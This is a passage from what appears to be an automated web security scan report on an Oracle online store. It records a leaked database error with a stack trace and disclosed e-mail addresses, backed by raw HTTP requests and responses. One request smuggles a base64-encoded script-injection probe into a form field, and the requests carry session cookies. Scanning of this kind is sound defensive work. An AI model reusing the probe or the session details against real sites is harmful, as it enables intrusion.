1-this.curveincrement(elapsed/obj.glidetime); var currentclip=(distancepercent*obj.contentheight)+"px"; obj.style.clip=(direction=="down")? "rect(0 auto "+currentclip+" 0)" : "rect("+currentclip+" auto auto 0)"; window["glidetimer_"+obj.id]=setTimeout(function(){slideengine(obj, direction)}, 10); } else{ obj.style.clip="rect(0 auto auto 0)"; } } function hide(activeobj, subobj, e){ if (!isPopUpExist(activeobj, e)){ window["hidetimer_"+subobj.id]=setTimeout(function(){ subobj.style.visibility="hidden" subobj.style.left=subobj.style.top=0 clearTimeout(window["glidetimer_"+subobj.id]) }, hidedivmouseout[1]) } } function initpopup(anchorid, pos, glidetime, revealbehavior){ var anchorobj=document.getElementById(anchorid); var subobj=document.getElementById(anchorobj.getAttribute('rel')); subobj.dropposition=pos.split("-"); subobj.glidetime=glidetime || 1000; subobj.style.left=subobj.style.top=0; if (typeof revealbehavior=='undefined' || revealbehavior=='mouseover'){ anchorobj.onmouseover=function(e){showSLPopup(this, subobj, e)} anchorobj.onmouseout=function(e){hide(subobj, subobj, e)} if (this.disableanchorlink) anchorobj.onclick=function(){return false} } else anchorobj.onclick=function(e){showSLPopup(this, subobj, e); return false} if (this.hidedivmouseout[0]==true) subobj.onmouseout=function(e){hide(this, subobj, e)} }</script> </HEAD><body class="applicationBody"><!-- ibeCCtdTop.jsp end --><!-- ibeCZzdTop.jsp end --><!-- $Header: ibeCZzdMenu.jsp 120.4 2005/09/16 11:44:37 appldev ship $ -->



























<!-- $Header: ibeCCtdMenu.jsp 120.32.12010000.7 2009/06/02 09:02:13 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><a href="#TheContent"><img src="/OA_MEDIA/jtfutrpx.gif" align=right width=1 height=1 alt="Skip navigation elements to page contents" border="0"></a><table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td class="topBG"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td colspan="2" height="10"><img src="/OA_MEDIA/jtfutrpx.gif" alt="" height="10"></td> </tr> <tr><!--- Commented the hardrcoded logo image bug 6794502 <td width="5%" valign="center"> <img src="/OA_MEDIA/FNDSSCORP.gif" alt="" border="0"/> </td>---><td width='5%' valign='center' ><a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=14405:1435532:US"><img src="jtfDownload.jsp?fileid=ZG03AC940FB91C48BC025925FD2D46F903BE1147E8CBF90D0A&appName=IBE&sitex=14405:1435532:US" ALT="Logo principal du magasin" border=0 ></a></td> <td width="95%" valign="bottom" class="applicationName"> &nbsp;&nbsp;Oracle Unbreakable Linux and Oracle VM Store </td> </tr> <tr> <td colspan="2" align="right"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Sites</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/misibeCScdViewA_LJE.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Cart</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCOtdOrdSumMain.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Orders</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpProfMenuHome.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Profile</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Login</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOReg.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Register</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdHelp.jsp?sitex=14405:1435532:US" class=OraGlobalButtonText> Help</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> </tr> </table> </td> </tr> <tr> <td height="1" colspan="2" valign="bottom" align="left"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabL.gif" alt="" border="0"/></td> <td nowrap class="OraTabBarEnabled"> <a class="OraTabBarEnabled" target=_parent href="http://oraclestore.oracle.com/OA_HTML/ibeCCtpSctDspRte.jsp?section=87615&sitex=14405:1435532:US">Oracle Unbreakable Linux and Oracle VM Store</a> </td> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabR.gif" alt="" border="0"/></td> <td width="1"/> </tr> </table> </td> </tr> <tr> <td align="left" background="/OA_HTML/cabo/images/swan/header-Bg.gif" colspan="2"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8" height="5" /></td> </tr> </table> </td> </tr> </table> </td> </tr></table><form method="get" target=_parent name=searchItemaction="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchResults.jsp"><INPUT TYPE=hidden NAME="cg" value=""><INPUT TYPE=hidden NAME="kw" value=""><INPUT TYPE=hidden NAME="ds" value="0"><INPUT TYPE=hidden NAME="dr" value="50"><INPUT TYPE=hidden NAME="st" value="kw"><INPUT TYPE=hidden NAME="cpg" value="0"> <!-- PREFAB_REF=""--></form><script language="JavaScript"><!--function postSearchItem() { var serIt = document.searchItem; var selIndex = document.common.cg.selectedIndex; serIt.cg.value = document.common.cg.options[selIndex].value; serIt.kw.value = document.common.kw.value; serIt.submit();}//--></script><form name=common onSubmit="postSearchItem();return false;"><table summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody> <tr class="searchBar"> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> <td align="left" valign="middle" nowrap height="25"> <table summary="" border="0" cellspacing="0" cellpadding="0"> <tr> <td valign="middle" nowrap class=prompt> Quick Search </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="cg"><span class="jttinvis"> Quick Search&nbsp;&nbsp;</span></label> <select id="cg" name="cg" class="prompt"> <option value=-200 >All Products <option value=-200>All Products </select> </td> <td class="prompt" align="right" nowrap> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="query"><span class="jttinvis"> Keyword(s):</span></label> <INPUT id="query" TYPE="text" size="30" NAME="kw" value=""> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td> <script language="JavaScript"> buttonGen("Go","javascript:postSearchItem()"); </script> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td nowrap> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchAdvForm.jsp?sitex=14405:1435532:US" target=_parent class="searchBarLink"> Advanced Search</a>&nbsp;<a class=searchBarLink target=_parent href="/OA_HTML/ibeCCtpSctDspRte.jsp?section=11365&media=os_g_english_help_search_tool">Help</a> </a> </td> </tr> </table> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> </tr></table></form><a id="TheContent" name="TheContent"></a><table class="contentBG" summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody><!-- 11/11/2008 amaheshw Bug 7502501 --><tr><td colspan=3><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></td></tr><tr><td><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=10></td><td width=100%><NOSCRIPT><table summary="" border=0 cellspacing=0 cellpadding=0> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=5><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=13></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR> <TR> <TD>&nbsp;</TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=OraBGAccentDark> <img alt='' height=32 src="/OA_MEDIA/jtfuwarn.gif" width=32></TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=errorHeader>Error</TD> <TD class=errorMessage><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=20></TD> <TD class=errorMessage width="100%"> <LI>JavaScript is disabled on your browser. JavaScript needs to be turned on for the application to be fully functional. </TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD>&nbsp;</TD> </TR> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=7><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR></table></NOSCRIPT>










<!-- $Header: ibeCAcdProfMenuTop.jsp 120.0 2005/05/30 03:20:10 appldev noship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><!-- ibeCCtdMenu.jsp end --><!-- ibeCZzdMenu.jsp end --><!-- body section ------------------------------------------------------------> <table summary='' border="0" width="100%" cellspacing="0" cellpadding="0"> <!-- left column ---------------------------------------------------------> <tr><td valign="top" width="15%&qu..
Database Error Message

Database Error Message
1 TOTAL
LOW
Netsparker identified a database error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.

Remedy

Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.

Classification

OWASP A6 PCI v1.2-6.5.6 PCI v2.0-6.5.5 CWE-200 CAPEC-118 WASC-13
- /OA_HTML/ibeCCtpBuyRoute.jsp

/OA_HTML/ibeCCtpBuyRoute.jsp

http://oraclestore.oracle.com/OA_HTML/ibeCCtpBuyRoute.jsp

Parameters

Parameter Type Value
item POST 925056
refpage POST misibeCCtdItemDetail.jsp?item=925056&section=87615&section=87615
tmpx POST 100
tmpy POST 100
section POST 87615
event POST 3
shopListName POST null
action POST null
item_type_code POST STD
uom POST data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAyMDdFKTwvc2NyaXB0Pg==
qty POST 1

Request

POST /OA_HTML/ibeCCtpBuyRoute.jsp HTTP/1.1
Referer: http://oraclestore.oracle.com/OA_HTML/ibeCCtpItmDspRte.jsp?item=925056§ion=87615&beginIndex=0&sitex=14405:1435532:US
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: oraclestore.oracle.com
Cookie: JSESSIONID=127875c07444db715cc9739355473dd54409ba9c47657392f075cdaa3c9a6a20.e34Qb38Qax0Obi0La3mQaxaObxuOe0; GSI_pses=ZGB8694A1CACCA04BDFCFD4D9B70D3A05EA2C0EECC9C8E780D7082AA5A31609F48A4EA02CD071B2336BDC010B5984DDCF6; BIGipServergsiap_store_http=3540882061.5150.0000; GSI=JFWp6ALUuGKvgqnyV2zBOJJFVf
Content-Length: 277
Expect: 100-continue
Accept-Encoding: gzip, deflate

item=925056&refpage=misibeCCtdItemDetail.jsp%3fitem%3d925056%26section%3d87615%26section%3d87615&tmpx=100&tmpy=100§ion=87615&event=3&shopListName=null&action=null&item_type_code=STD&uom=data%3A%3Bbase64%2CJyI%2bPHNjcmlwdD5uZXRzcGFya2VyKDB4MDAyMDdFKTwvc2NyaXB0Pg%3d%3d&qty=1

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Content-Length: 2070
Date: Sun, 11 Sep 2011 18:09:01 GMT
Content-Location: https://oraclestore.oracle.com/OA_HTML/ibeCZzdError.jsp






























<!-- $Header: ibeCZzdError.jsp 120.6.12010000.2 2009/09/18 06:58:22 saradhak ship $ --><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"><HTML lang="EN-US"><HEAD> <TITLE>Application Error</TITLE> <link rel='stylesheet' href='ibeCStyleSheet.css'></HEAD><BODY class=popupBody><SCRIPT LANGUAGE="JavaScript" SRC="ibeCButton.js"></script><NOSCRIPT><table summary=" " border=0 cellspacing=0 cellpadding=0> <TR> <TD><img alt=" " height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=5><img alt=" " height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark><img alt=" " height=1 src="/OA_MEDIA/jtfutrpx.gif" width=13></TD> <TD><img alt=" " height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR> <TR> <TD>&nbsp;</TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=OraBGAccentDark> <img alt=" " height=32 src="/OA_MEDIA/jtfuwarn.gif" width=32></TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=errorHeader>Error</TD> <TD class=errorMessage><img alt=" " height=1 src="/OA_MEDIA/jtfutrpx.gif" width=20></TD> <TD class=errorMessage width="100%"> <LI>JavaScript is disabled on your browser. JavaScript needs to be turned on for the application to be fully functional. </TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD>&nbsp;</TD> </TR> <TR> <TD><img alt=" " height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=7><img alt=" " height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD><img alt=" " height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR></table></NOSCRIPT><table summary='' width="100%" border="0" cellpadding="5"> <tr><td><img alt="" height=20 src="/OA_MEDIA/jtfutrpx.gif" width=1></td></tr> <tr> <td width="5%">&nbsp;</td> <td> <table summary='' width="100%" border="0"> <tr> <td class="pageTitle">Application Error</td> </tr> <tr> <td class="prompt"> &nbsp;<p> The application is currently not available or an unexpected error has occured. Please try again later.<br> If this message persists, please contact the system administrator. <p>&nbsp; </td> </tr> <tr> <td class="prompt"> <form> <script language="JavaScript"> buttonGen("Return to Previous Page","javascript:top.history.back()"); </script> </form> </td> </tr> </table> </td> <td width="5%">&nbsp;</td> </tr></table><!--Message: ORA-06502: PL/SQL: numeric or value error: character string buffer too smallORA-06512: at "APPS.IBE_QUOTE_W1_PVT", line 2926ORA-06512: at "APPS.IBE_QUOTE_W1_PVT", line 4750ORA-06512: at line 1Stack:java.sql.SQLException: ORA-06502: PL/SQL: numeric or value error: character string buffer too smallORA-06512: at "APPS.IBE_QUOTE_W1_PVT", line 2926ORA-06512: at "APPS.IBE_QUOTE_W1_PVT", line 4750ORA-06512: at line 1 at oracle.jdbc.driver.T4CTTIoer.processError(T4CTTIoer.java:439) at oracle.jdbc.driver.T4CTTIoer.processError(T4CTTIoer.java:395) at oracle.jdbc.driver.T4C8Oall.processError(T4C8Oall.java:802) at oracle.jdbc.driver.T4CTTIfun.receive(T4CTTIfun.java:436) at oracle.jdbc.driver.T4CTTIfun.doRPC(T4CTTIfun.java:186) at oracle.jdbc.driver.T4C8Oall.doOALL(T4C8Oall.java:521) at oracle.jdbc.driver.T4CCallableStatement.doOall8(T4CCallableStatement.java:202) at oracle.jdbc.driver.T4CCallableStatement.executeForRows(T4CCallableStatement.java:1005) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:1307) at oracle.jdbc.driver.OraclePreparedStatement.executeInternal(OraclePreparedStatement.java:3449) at oracle.jdbc.driver.OraclePreparedStatement.execute(OraclePreparedStatement.java:3550) at oracle.jdbc.driver.OracleCallableStatement.execute(OracleCallableStatement.java:4710) at oracle.jdbc.driver.OraclePreparedStatementWrapper.execute(OraclePreparedStatementWrapper.java:1374) at oracle.apps.ibe.shoppingcart.quote.Quote.save(Quote.java:6193) at oracle.apps.ibe.shoppingcart.quote.ShoppingCart.addItemsToCart(ShoppingCart.java:7765) at _misibeCScpAddItem__LJE._jspService(_misibeCScpAddItem__LJE.java:1507) at com.orionserver.http.OrionHttpJspPage.service(OrionHttpJspPage.java:59) at oracle.jsp.runtimev2.JspPageTable.service(JspPageTable.java:390) at oracle.jsp.runtimev2.JspServlet.internalService(JspServlet.java:594) at oracle.jsp.runtimev2.JspServlet.service(JspServlet.java:518) at javax.servlet.http.HttpServlet.service(HttpServlet.java:856) at com.evermind.server.http.ServletRequestDispatcher.invoke(ServletRequestDispatcher.java:734) at com.evermind.server.http.ServletRequestDispatcher.forwardInternal(ServletRequestDispatcher.java:391) at com.evermind.server.http.ServletRequestDispatcher.unprivileged_forward(ServletRequestDispatcher.java:280) at com.evermind.server.http.ServletRequestDispatcher.access$100(ServletRequestDispatcher.java:68) at com.evermind.server.http.ServletRequestDispatcher$2.oc4jRun(ServletRequestDispatcher.java:214) at oracle.oc4j.security.OC4JSecurity.doPrivileged(OC4JSecurity.java:284) at com.evermind.server.http.ServletRequestDispatcher.forward(ServletRequestDispatcher.java:219) at com.evermind.server.http.EvermindPageContext.forward(EvermindPageContext.java:395) at _ibeCCtpBuyRoute._jspService(_ibeCCtpBuyRoute.java:2490) at com.orionserver.http.OrionHttpJspPage.service(OrionHttpJspPage.java:59) at oracle.jsp.runtimev2.JspPageTable.service(JspPageTable.java:390) at oracle.jsp.runtimev2.JspServlet.internalService(JspServlet.java:594) at oracle.jsp.runtimev2.JspServlet.service(JspServlet.java:518) at javax.servlet.http.HttpServlet.service(HttpServlet.java:856) at com.evermind.server.http.ResourceFilterChain.doFilter(ResourceFilterChain.java:64) at oracle.apps.ibe.util.IBEReleaseResFilter.doFilter(IBEReleaseResFilter.java:42) at com.evermind.server.http.EvermindFilterChain.doFilter(EvermindFilterChain.java:15) at oracle.apps.ibe.util.IBEReleaseResFilter.doFilter(IBEReleaseResFilter.java:42) at com.evermind.server.http.EvermindFilterChain.doFilter(EvermindFilterChain.java:17) at oracle.apps.jtf.base.session.ReleaseResFilter.doFilter(ReleaseResFilter.java:26) at com.evermind.server.http.EvermindFilterChain.doFilter(EvermindFilterChain.java:17) at oracle.apps.fnd.security.AppsServletFilter.doFilter(AppsServletFilter.java:318) at com.evermind.server.http.ServletRequestDispatcher.invoke(ServletRequestDispatcher.java:642) at com.evermind.server.http.ServletRequestDispatcher.forwardInternal(ServletRequestDispatcher.java:391) at com.evermind.server.http.HttpRequestHandler.doProcessRequest(HttpRequestHandler.java:908) at com.evermind.server.http.HttpRequestHandler.processRequest(HttpRequestHandler.java:458) at com.evermind.server.http.AJPRequestHandler.run(AJPRequestHandler.java:313) at com.evermind.server.http.AJPRequestHandler.run(AJPRequestHandler.java:199) at oracle.oc4j.network.ServerSocketReadHandler$SafeRunnable.run(ServerSocketReadHandler.java:260) at com.evermind.util.ReleasableResourcePooledExecutor$MyWorker.run(ReleasableResourcePooledExecutor.java:303) at java.lang.Thread.run(Thread.java:662)--></body></html><!-- ibeCZzdError.jsp -->
E-mail Address Disclosure

E-mail Address Disclosure
1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

Classification

OWASP A6 PCI v1.2-6.5.6 WASC-13
- /OA_HTML/ibeCZzdHelp.jsp

/OA_HTML/ibeCZzdHelp.jsp

https://oraclestore.oracle.com/OA_HTML/ibeCZzdHelp.jsp?GSI=xw7XzrhVDfQxPPTRIpSLNd3Y2y&GSI_pses=ZG585..

Found E-mails

  • storesales_uk@oracle.com
  • oraclehelp_ww@oracle.com

Request

GET /OA_HTML/ibeCZzdHelp.jsp?GSI=xw7XzrhVDfQxPPTRIpSLNd3Y2y&GSI_pses=ZG58546D7CC88023DFCAD78C33D94F83ED7A0D70952D644BCC5157A841AAB5468E856736C9A89661BEAE2F1B15C4D323B5 HTTP/1.1
Referer: https://oraclestore.oracle.com/OA_HTML/ibeCCtdMinisites.jsp?language=US&ref=http%3A%2F%2Foraclestore.oracle.com%2FOA_HTML%2FibeCZzpHome.jsp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: oraclestore.oracle.com
Cookie: JSESSIONID=7a35c7e2eee5794721729186d7d44bf1fb9b4f0512eaf379378489f55e44618c.e34Qb38Qax0Obi0La3mQaxaObxuOe0; BIGipServergsiap_store_http=1510838925.5150.0000; GSI=xw7XzrhVDfQxPPTRIpSLNd3Y2y
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Set-Cookie: JSESSIONID=7a35c7e2eee5794721729186d7d44bf1fb9b4f0512eaf379378489f55e44618c.e34Qb38Qax0Obi0La3mQaxaObxuOe0; path=/OA_HTML; secure
Content-Length: 7514
Date: Sun, 11 Sep 2011 17:56:24 GMT
































<!-- $Header: ibeCZzdHelp.jsp 120.2 2007/12/05 08:10:50 scnagara ship $ --><!-- $Header: ibeCZzpHeader.jsp 120.32.12010000.3 2009/03/03 06:43:46 ukalaiah ship $ --><!-- ibeCZzpHeader.jsp end --> <!-- $Header: ibeCZzdTop.jsp 120.2 2005/07/04 04:26:38 appldev ship $ --> <!-- $Header: ibwTrackingHeader.jsp 120.6 2006/01/22 21:55 schittar noship $ -->















<!-- $Header: ibeCCtdTop.jsp 120.7.12010000.6 2010/04/23 07:18:39 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><HTML lang="EN-US"><HEAD> <TITLE> Site:Help </TITLE> <link rel=stylesheet href=ibeCStyleSheet.css> <SCRIPT LANGUAGE="JavaScript" SRC="ibeCButton.js"></script> <script LANGUAGE="javascript"> var disableanchorlink= true; var hidedivmouseout= [true, 200]; var formNameSL="null"; var relatedIndex="null"; function getWinOffset(what, offsettype){ return (what.offsetParent)? what[offsettype]+this.getWinOffset(what.offsetParent, offsettype) : what[offsettype]; } function isPopUpExist(m, e){ var e=window.event || e var c=e.relatedTarget || ((e.type=="mouseover")? e.fromElement : e.toElement) while (c && c!=m)try {c=c.parentNode} catch(e){c=m} if (c==m) return true; else return false; } function showSLPopup(anchorobj, subobj, e){ try{ if(isItemPopupOpen()){ closeItemPopup(); } }catch(ex){} formNameSL = anchorobj.getAttribute("formname"); try{ relatedIndex = anchorobj.getAttribute("relindex"); }catch(ex){} try{ document.getElementById('text_cr_shoplist').value='Create Shopping List'; }catch(ex){} try{ document.getElementById('text_cr_shoplist_details').value='Create Shopping List'; }catch(ex){} if (!this.isPopUpExist(anchorobj, e) || (e && e.type=="click")){ var e=window.event || e; if (e.type=="click" && subobj.style.visibility=="visible"){ subobj.style.visibility="hidden"; return; } var subobjtemp; if(formNameSL == 'relatedForm'){ subobjtemp=document.getElementById('tempoffset_related'); } else { subobjtemp=document.getElementById('tempoffset'); } var horizontaloffset=(subobj.dropposition[0]=="left")? -(subobj.offsetWidth-anchorobj.offsetWidth) : 0; var verticaloffset=(subobj.dropposition[1]=="top")? -subobj.offsetHeight : anchorobj.offsetHeight ; subobj.style.left=this.getWinOffset(subobjtemp, "offsetLeft") + horizontaloffset + "px"; subobj.style.top=this.getWinOffset(anchorobj, "offsetTop")+verticaloffset+"px"; subobj.style.clip=(subobj.dropposition[1]=="top")? "rect(auto auto auto 0)" : "rect(0 auto 0 0)"; subobj.style.visibility="visible"; subobj.startTime=new Date().getTime(); subobj.contentheight=parseInt(subobj.offsetHeight); if (typeof window["hidetimer_"+subobj.id]!="undefined") clearTimeout(window["hidetimer_"+subobj.id]); this.slideengine(subobj, (subobj.dropposition[1]=="top")? "up" : "down"); } } function curveincrement(percent){ return (1-Math.cos(percent*Math.PI)) / 2 ; } function slideengine(obj, direction){ var elapsed=new Date().getTime()-obj.startTime; if (elapsed<obj.glidetime){ var distancepercent=(direction=="down")? this.curveincrement(elapsed/obj.glidetime) : 1-this.curveincrement(elapsed/obj.glidetime); var currentclip=(distancepercent*obj.contentheight)+"px"; obj.style.clip=(direction=="down")? "rect(0 auto "+currentclip+" 0)" : "rect("+currentclip+" auto auto 0)"; window["glidetimer_"+obj.id]=setTimeout(function(){slideengine(obj, direction)}, 10); } else{ obj.style.clip="rect(0 auto auto 0)"; } } function hide(activeobj, subobj, e){ if (!isPopUpExist(activeobj, e)){ window["hidetimer_"+subobj.id]=setTimeout(function(){ subobj.style.visibility="hidden" subobj.style.left=subobj.style.top=0 clearTimeout(window["glidetimer_"+subobj.id]) }, hidedivmouseout[1]) } } function initpopup(anchorid, pos, glidetime, revealbehavior){ var anchorobj=document.getElementById(anchorid); var subobj=document.getElementById(anchorobj.getAttribute('rel')); subobj.dropposition=pos.split("-"); subobj.glidetime=glidetime || 1000; subobj.style.left=subobj.style.top=0; if (typeof revealbehavior=='undefined' || revealbehavior=='mouseover'){ anchorobj.onmouseover=function(e){showSLPopup(this, subobj, e)} anchorobj.onmouseout=function(e){hide(subobj, subobj, e)} if (this.disableanchorlink) anchorobj.onclick=function(){return false} } else anchorobj.onclick=function(e){showSLPopup(this, subobj, e); return false} if (this.hidedivmouseout[0]==true) subobj.onmouseout=function(e){hide(this, subobj, e)} }</script> </HEAD><body class="applicationBody"><!-- ibeCCtdTop.jsp end --><!-- ibeCZzdTop.jsp end --><!-- $Header: ibeCZzdMenu.jsp 120.4 2005/09/16 11:44:37 appldev ship $ -->



























<!-- $Header: ibeCCtdMenu.jsp 120.32.12010000.7 2009/06/02 09:02:13 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><a href="#TheContent"><img src="/OA_MEDIA/jtfutrpx.gif" align=right width=1 height=1 alt="Skip navigation elements to page contents" border="0"></a><table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td class="topBG"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td colspan="2" height="10"><img src="/OA_MEDIA/jtfutrpx.gif" alt="" height="10"></td> </tr> <tr><!--- Commented the hardrcoded logo image bug 6794502 <td width="5%" valign="center"> <img src="/OA_MEDIA/FNDSSCORP.gif" alt="" border="0"/> </td>---><td width='5%' valign='center' ><a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=10145:1298447:US"><img src="jtfdload.jsp?fileid=455388252&appName=IBE&sitex=10145:1298447:US" ALT="Site Main Logo" border=0 ></a></td> <td width="95%" valign="bottom" class="applicationName"> &nbsp;&nbsp;Finland </td> </tr> <tr> <td colspan="2" align="right"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Sites</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/misibeCScdViewA.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Cart</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCOtdOrdSumMain.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Orders</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpProfMenuHome.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Profile</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Login</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOReg.jsp?sitex=10145:1298447:US" class=OraGlobalButtonText> Register</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdHelp.jsp?sitex=10145:1298447:US" class=OraGlobalButtonTextSelected> Help</a> </td> <td><img 